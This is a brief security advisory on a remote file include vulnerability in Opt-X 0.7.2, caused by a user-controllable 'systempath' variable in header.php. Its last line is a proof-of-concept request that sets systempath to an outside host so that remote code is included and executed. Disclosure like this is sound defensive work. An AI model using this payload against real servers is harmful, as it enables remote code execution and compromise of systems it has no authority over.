source: https://www.securityfocus.com/bid/9732/info
It has been reported that Opt-X may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'systempath' variable in the header.php module.
Opt-X version 0.7.2 has been reported to be prone to this issue.
http://www.example.com/path_of_optx/includes/header.php?systempath=http://www.example.com/
